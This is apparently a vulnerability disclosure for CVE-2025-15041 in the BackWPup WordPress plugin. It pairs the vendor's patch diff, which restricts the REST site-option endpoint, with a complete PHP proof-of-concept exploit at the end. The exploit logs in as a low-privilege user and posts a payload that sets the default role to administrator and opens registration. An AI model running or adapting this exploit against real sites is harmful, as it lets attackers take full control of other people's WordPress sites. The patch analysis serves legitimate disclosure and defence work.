CVE-2025-15041: BackWPup 5.0.0 – 5.6.2 – Authenticated (BackWPup Helper+) Privilege Escalation via Arbitrary Options Update (backwpup)

--- a/backwpup/backwpup.php
+++ b/backwpup/backwpup.php
@@ -5,7 +5,7 @@
  * Description: WordPress Backup Plugin
  * Author: BackWPup – WordPress Backup & Restore Plugin
  * Author URI: https://backwpup.com
- * Version: 5.6.2
+ * Version: 5.6.3
  * Requires at least: 4.9
  * Requires PHP: 7.4
  * Text Domain: backwpup
--- a/backwpup/inc/class-destination-ftp-downloader.php
+++ b/backwpup/inc/class-destination-ftp-downloader.php
@@ -132,9 +132,16 @@
 			$this->source_file_handler = @fopen( $url, 'r' ); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged, WordPress.WP.AlternativeFunctions.file_system_operations_fopen
 		}

-        if (!is_resource($this->source_file_handler)) {
-            throw new RuntimeException(__('Cannot open FTP file for download.', 'backwpup'));
-        }
+		if ( ! is_resource( $this->source_file_handler ) ) {
+			throw new RuntimeException(
+				sprintf(
+					// translators: %1$s: opening a tag, %2$s: closing a tag.
+					esc_html__( 'BackWPup couldn’t download the backup file from your FTP server. Please check your FTP connection settings and permissions. See %1$sthe FTP setup guide%2$s for more details.', 'backwpup' ),
+					'<a href="https://backwpup.com/docs/how-to-save-backups-to-your-ftp-server/" title="the FTP setup guide" target="_blank" rel="noopener noreferrer" class="text-primary-darker border-b border-primary-darker">',
+					'</a>'
+				)
+			);
+		}
     }

     /**
--- a/backwpup/inc/class-destinations.php
+++ b/backwpup/inc/class-destinations.php
@@ -147,8 +147,15 @@
 	 * @return array
 	 */
 	public function file_get_list( string $jobdest ): array {
-		$list  = (array) get_site_transient( 'backwpup_' . strtolower( $jobdest ) );
-		$files = array_filter( $list );
+		$key  = 'backwpup_' . strtolower( $jobdest );
+		$list = get_site_transient( $key );
+
+		if ( false === $list ) {
+			// Legacy compatibility (e.g. Glacier history stored in options).
+			$list = get_site_option( $key, [] );
+		}
+
+		$files = array_filter( (array) $list );

 		// Disable auto downloading for onedrive during restoration see #1239 on Github.
 		if ( BackWPup::is_pro() && $this->get_service_name() !== 'OneDrive' ) {
--- a/backwpup/inc/class-file.php
+++ b/backwpup/inc/class-file.php
@@ -193,7 +193,7 @@
 			 *
 			 * @param bool $protect_folders Whether the folder will be protect or not.
 			 */
-			$protect_folders = wpm_apply_filters_typed( 'boolean', 'backwpup_protect_folders', (bool) get_site_option( 'backwpup_cfg_protectfolders' ) );
+			$protect_folders = wpm_apply_filters_typed( 'boolean', 'backwpup_protect_folders', true );
 			if ( $protect_folders ) {
 				self::protect_folder( $childFolder ); // phpcs:ignore
 			}
--- a/backwpup/inc/class-option.php
+++ b/backwpup/inc/class-option.php
@@ -19,7 +19,6 @@
 		// general.
 		add_site_option( 'backwpup_cfg_showadminbar', true );
 		add_site_option( 'backwpup_cfg_showfoldersize', false );
-		add_site_option( 'backwpup_cfg_protectfolders', true );
 		add_site_option( 'backwpup_cfg_keepplugindata', false );
 		// job.
 		add_site_option( 'backwpup_cfg_jobmaxexecutiontime', 30 );
--- a/backwpup/inc/class-page-settings.php
+++ b/backwpup/inc/class-page-settings.php
@@ -382,29 +382,28 @@

 		// Set default options if button clicked.
         if (isset($_POST['default_settings']) && $_POST['default_settings']) { // phpcs:ignore
-            delete_site_option('backwpup_cfg_showadminbar');
-            delete_site_option('backwpup_cfg_showfoldersize');
-            delete_site_option('backwpup_cfg_jobstepretry');
-            delete_site_option('backwpup_cfg_jobmaxexecutiontime');
-            delete_site_option('backwpup_cfg_loglevel');
-            delete_site_option('backwpup_cfg_jobwaittimems');
-            delete_site_option('backwpup_cfg_jobrunauthkey');
-            delete_site_option('backwpup_cfg_jobdooutput');
-            delete_site_option('backwpup_cfg_windows');
-            delete_site_option('backwpup_cfg_maxlogs');
-            delete_site_option('backwpup_cfg_gzlogs');
-            delete_site_option('backwpup_cfg_protectfolders');
-            delete_site_option('backwpup_cfg_authentication');
-            delete_site_option('backwpup_cfg_logfolder');
-            delete_site_option('backwpup_cfg_dropboxappkey');
-            delete_site_option('backwpup_cfg_dropboxappsecret');
-            delete_site_option('backwpup_cfg_dropboxsandboxappkey');
-            delete_site_option('backwpup_cfg_dropboxsandboxappsecret');
-            delete_site_option('backwpup_cfg_sugarsynckey');
-            delete_site_option('backwpup_cfg_sugarsyncsecret');
-            delete_site_option('backwpup_cfg_sugarsyncappid');
-            delete_site_option('backwpup_cfg_hash');
-            delete_site_option('backwpup_cfg_keepplugindata');
+			delete_site_option( 'backwpup_cfg_showadminbar' );
+			delete_site_option( 'backwpup_cfg_showfoldersize' );
+			delete_site_option( 'backwpup_cfg_jobstepretry' );
+			delete_site_option( 'backwpup_cfg_jobmaxexecutiontime' );
+			delete_site_option( 'backwpup_cfg_loglevel' );
+			delete_site_option( 'backwpup_cfg_jobwaittimems' );
+			delete_site_option( 'backwpup_cfg_jobrunauthkey' );
+			delete_site_option( 'backwpup_cfg_jobdooutput' );
+			delete_site_option( 'backwpup_cfg_windows' );
+			delete_site_option( 'backwpup_cfg_maxlogs' );
+			delete_site_option( 'backwpup_cfg_gzlogs' );
+			delete_site_option( 'backwpup_cfg_authentication' );
+			delete_site_option( 'backwpup_cfg_logfolder' );
+			delete_site_option( 'backwpup_cfg_dropboxappkey' );
+			delete_site_option( 'backwpup_cfg_dropboxappsecret' );
+			delete_site_option( 'backwpup_cfg_dropboxsandboxappkey' );
+			delete_site_option( 'backwpup_cfg_dropboxsandboxappsecret' );
+			delete_site_option( 'backwpup_cfg_sugarsynckey' );
+			delete_site_option( 'backwpup_cfg_sugarsyncsecret' );
+			delete_site_option( 'backwpup_cfg_sugarsyncappid' );
+			delete_site_option( 'backwpup_cfg_hash' );
+			delete_site_option( 'backwpup_cfg_keepplugindata' );

             foreach ($this->settings_updaters as $setting) {
                 $setting->reset();
@@ -434,7 +433,6 @@
 			'backwpup_cfg_windows'              => get_site_option( 'backwpup_cfg_windows' ),
 			'backwpup_cfg_maxlogs'              => get_site_option( 'backwpup_cfg_maxlogs' ),
 			'backwpup_cfg_gzlogs'               => get_site_option( 'backwpup_cfg_gzlogs' ),
-			'backwpup_cfg_protectfolders'       => get_site_option( 'backwpup_cfg_protectfolders' ),
 			'backwpup_cfg_jobrunauthkey'        => get_site_option( 'backwpup_cfg_jobrunauthkey' ),
 			'backwpup_cfg_logfolder'            => get_site_option( 'backwpup_cfg_logfolder' ),
 			'backwpup_cfg_authentication'       => get_site_option( 'backwpup_cfg_authentication' ),
@@ -473,8 +471,7 @@
 			$new_options['backwpup_cfg_maxlogs'] = absint( $_POST['maxlogs'] );
 		}

-		$new_options['backwpup_cfg_gzlogs']         = ! empty( $_POST['gzlogs'] );
-		$new_options['backwpup_cfg_protectfolders'] = ! empty( $_POST['protectfolders'] );
+		$new_options['backwpup_cfg_gzlogs'] = ! empty( $_POST['gzlogs'] );

 		if ( isset( $_POST['jobrunauthkey'] ) ) {
 			$new_options['backwpup_cfg_jobrunauthkey'] = preg_replace( '/[^a-zA-Z0-9]/', '', trim( (string) sanitize_text_field( wp_unslash( $_POST['jobrunauthkey'] ) ) ) );
--- a/backwpup/pages/backups.php
+++ b/backwpup/pages/backups.php
@@ -17,6 +17,7 @@
         <div class="progressbar" style="display: none;">
           <div id="progresssteps" class="bwpu-progress" style="width:0%;">0%</div>
         </div>
+        <div id="error-ui" style="display: none;" role="alert" aria-live="polite"></div>
       <?php
       if ( BackWPup::is_pro() ) {
         $view = new ViewLoader();
--- a/backwpup/src/Admin/Subscriber.php
+++ b/backwpup/src/Admin/Subscriber.php
@@ -55,7 +55,6 @@
 			'backwpup_activation_time',
 			'backwpup_cfg_showadminbar',
 			'backwpup_cfg_showfoldersize',
-			'backwpup_cfg_protectfolders',
 			'backwpup_cfg_keepplugindata',
 			'backwpup_cfg_jobmaxexecutiontime',
 			'backwpup_cfg_jobstepretry',
--- a/backwpup/src/Hosting/Kinsta.php
+++ b/backwpup/src/Hosting/Kinsta.php
@@ -53,6 +53,9 @@
 	 * @return string Returns 'db' if the backup type is only database, 'file' if it is only files, 'full' if it is both, or an empty string if none match.
 	 */
 	public function get_backup_type( array $job_data ) {
+		if ( empty( $job_data['type'] ) || ! is_array( $job_data['type'] ) ) {
+			return '';
+		}
 		if ( ! in_array( 'FILE', $job_data['type'], true ) && in_array( 'DBDUMP', $job_data['type'], true ) ) {
 			return 'db';
 		} elseif ( in_array( 'FILE', $job_data['type'], true ) && ! in_array( 'DBDUMP', $job_data['type'], true ) ) {
--- a/backwpup/src/Jobs/API/Rest.php
+++ b/backwpup/src/Jobs/API/Rest.php
@@ -334,7 +334,9 @@
 			[
 				'methods'             => 'POST',
 				'callback'            => [ $this, 'save_site_option' ],
-				'permission_callback' => [ $this, 'has_permission' ],
+				'permission_callback' => function () {
+					return current_user_can( 'backwpup_jobs_edit' ) || current_user_can( 'backwpup_settings' );
+				},
 			]
 		);

@@ -784,6 +786,8 @@
 	 * @param WP_REST_Request $request The REST request object containing the parameters.
 	 *
 	 * @return WP_REST_Response The response object containing the status and message.
+	 *
+	 * @throws RuntimeException If an update of a site option is not allowed.
 	 */
 	public function save_site_option( WP_REST_Request $request ) {
 		$params = $request->get_params();
@@ -791,6 +795,14 @@
 		$status = 200;
 		try {
 			foreach ( $params as $key => $values ) {
+				if ( strpos( $key, 'backwpup' ) !== 0 || in_array( $key, [ 'backwpup_jobs', 'backwpup_version', 'backwpup_previous_version', 'backwpup_messages' ], true ) ) {
+					// translators: %s = site option name.
+					throw new RuntimeException( sprintf( __( 'Update of site option with name is "%s" not allowed!', 'backwpup' ), $key ) );
+				}
+				if ( ! is_array( $values ) || ! array_key_exists( 'value', $values ) ) {
+					// translators: %s = site option name.
+					throw new RuntimeException( sprintf( __( 'Invalid data format for site option "%s".', 'backwpup' ), $key ) );
+				}
 				if ( '' !== trim( $values['value'] ) ) {
 					$value = sanitize_text_field( $values['value'] );
 					if ( isset( $values['secure'] ) && true === filter_var( $values['secure'], FILTER_VALIDATE_BOOLEAN ) ) {
--- a/backwpup/vendor/autoload.php
+++ b/backwpup/vendor/autoload.php
@@ -19,4 +19,4 @@

 require_once __DIR__ . '/composer/autoload_real.php';

-return ComposerAutoloaderInit5cbcfb1449c8529bdcab591b4c0578d6::getLoader();
+return ComposerAutoloaderInit78debad7f3a589ccb6f8e0e447ced1a5::getLoader();
--- a/backwpup/vendor/composer/autoload_real.php
+++ b/backwpup/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@

 // autoload_real.php @generated by Composer

-class ComposerAutoloaderInit5cbcfb1449c8529bdcab591b4c0578d6
+class ComposerAutoloaderInit78debad7f3a589ccb6f8e0e447ced1a5
 {
     private static $loader;

@@ -24,20 +24,20 @@

         require __DIR__ . '/platform_check.php';

-        spl_autoload_register(array('ComposerAutoloaderInit5cbcfb1449c8529bdcab591b4c0578d6', 'loadClassLoader'), true, true);
+        spl_autoload_register(array('ComposerAutoloaderInit78debad7f3a589ccb6f8e0e447ced1a5', 'loadClassLoader'), true, true);
         self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(__DIR__));
-        spl_autoload_unregister(array('ComposerAutoloaderInit5cbcfb1449c8529bdcab591b4c0578d6', 'loadClassLoader'));
+        spl_autoload_unregister(array('ComposerAutoloaderInit78debad7f3a589ccb6f8e0e447ced1a5', 'loadClassLoader'));

         $includePaths = require __DIR__ . '/include_paths.php';
         $includePaths[] = get_include_path();
         set_include_path(implode(PATH_SEPARATOR, $includePaths));

         require __DIR__ . '/autoload_static.php';
-        call_user_func(ComposerAutoloadComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::getInitializer($loader));
+        call_user_func(ComposerAutoloadComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::getInitializer($loader));

         $loader->register(true);

-        $filesToLoad = ComposerAutoloadComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::$files;
+        $filesToLoad = ComposerAutoloadComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::$files;
         $requireFile = Closure::bind(static function ($fileIdentifier, $file) {
             if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
                 $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;
--- a/backwpup/vendor/composer/autoload_static.php
+++ b/backwpup/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@

 namespace ComposerAutoload;

-class ComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6
+class ComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5
 {
     public static $files = array (
         '7b11c4dc42b3b3023073cb14e519683c' => __DIR__ . '/..' . '/ralouphie/getallheaders/src/getallheaders.php',
@@ -497,10 +497,10 @@
     public static function getInitializer(ClassLoader $loader)
     {
         return Closure::bind(function () use ($loader) {
-            $loader->prefixLengthsPsr4 = ComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::$prefixLengthsPsr4;
-            $loader->prefixDirsPsr4 = ComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::$prefixDirsPsr4;
-            $loader->prefixesPsr0 = ComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::$prefixesPsr0;
-            $loader->classMap = ComposerStaticInit5cbcfb1449c8529bdcab591b4c0578d6::$classMap;
+            $loader->prefixLengthsPsr4 = ComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::$prefixLengthsPsr4;
+            $loader->prefixDirsPsr4 = ComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::$prefixDirsPsr4;
+            $loader->prefixesPsr0 = ComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::$prefixesPsr0;
+            $loader->classMap = ComposerStaticInit78debad7f3a589ccb6f8e0e447ced1a5::$classMap;

         }, null, ClassLoader::class);
     }
--- a/backwpup/vendor/composer/installed.php
+++ b/backwpup/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'inpsyde/backwpup-pro',
-        'pretty_version' => '5.6.2',
-        'version' => '5.6.2.0',
-        'reference' => 'ea3ccc5ebab7f6b3a5d59ae7349234908d74950e',
+        'pretty_version' => '5.6.3',
+        'version' => '5.6.3.0',
+        'reference' => '0e479eb6bfaa730c171d973badd74f586f78a684',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -83,18 +83,18 @@
             'dev_requirement' => false,
         ),
         'inpsyde/backwpup-pro' => array(
-            'pretty_version' => '5.6.2',
-            'version' => '5.6.2.0',
-            'reference' => 'ea3ccc5ebab7f6b3a5d59ae7349234908d74950e',
+            'pretty_version' => '5.6.3',
+            'version' => '5.6.3.0',
+            'reference' => '0e479eb6bfaa730c171d973badd74f586f78a684',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
             'dev_requirement' => false,
         ),
         'inpsyde/backwpup-restore-shared' => array(
-            'pretty_version' => '0.20.4',
-            'version' => '0.20.4.0',
-            'reference' => '2bbdd156bcc39ce8e7d82447f685f9172a05fbf3',
+            'pretty_version' => '0.20.5',
+            'version' => '0.20.5.0',
+            'reference' => 'bdb08977a01a234a95cbc267bd5a81cf8ca7d2ba',
             'type' => 'library',
             'install_path' => __DIR__ . '/../inpsyde/backwpup-restore-shared',
             'aliases' => array(),
--- a/backwpup/vendor/inpsyde/backwpup-restore-shared/src/Api/Controller/JobController.php
+++ b/backwpup/vendor/inpsyde/backwpup-restore-shared/src/Api/Controller/JobController.php
@@ -193,6 +193,9 @@
         // Set service and job_id in registry for future use
         $this->registry->service_name = $service_name;
         $this->registry->job_id = $job_id;
+        //rest if uploaded again
+        $this->registry->uploaded_file = $local_file_path;
+        $this->registry->decompression_state = null;

         $factory = new BackWPup_Destination_Downloader_Factory();
         $downloader = $factory->create(
@@ -337,6 +340,11 @@
         // Restore the db.
         $this->database_importer->import();

+        //flush WP cache after db restore
+        if (function_exists('wp_cache_flush')) {
+            wp_cache_flush();
+        }
+
         // Refresh file list
         if ($this->registry->service_name && $this->registry->job_id) {
             $destination_factory = new DestinationFactory($this->registry->service_name);

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15041 - BackWPup 5.0.0 - 5.6.2 - Authenticated (BackWPup Helper+) Privilege Escalation via Arbitrary Options Update

<?php

$target_url = 'https://vulnerable-site.com';
$username = 'attacker';
$password = 'password';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$wp_rest_url = $target_url . '/wp-json/backwpup/v1/site-option';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_HEADER => true
]);

$response = curl_exec($ch);

// Step 2: Check authentication success
if (strpos($response, 'Location: ' . $target_url . '/wp-admin/') === false) {
    die('Authentication failed');
}

// Step 3: Exploit the vulnerability to enable admin registration
$payload = json_encode([
    'default_role' => ['value' => 'administrator'],
    'users_can_register' => ['value' => '1']
]);

curl_setopt_array($ch, [
    CURLOPT_URL => $wp_rest_url,
    CURLOPT_POSTFIELDS => $payload,
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/json',
        'Content-Length: ' . strlen($payload)
    ]
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Step 4: Verify exploitation
if ($http_code === 200 && strpos($response, 'success') !== false) {
    echo 'Vulnerability exploited successfully. Admin registration enabled.n';
    echo 'Attackers can now register at: ' . $target_url . '/wp-login.php?action=registern';
    echo 'New accounts will have administrator privileges.n';
} else {
    echo 'Exploitation failed. HTTP Code: ' . $http_code . 'n';
    echo 'Response: ' . $response . 'n';
}

curl_close($ch);

?>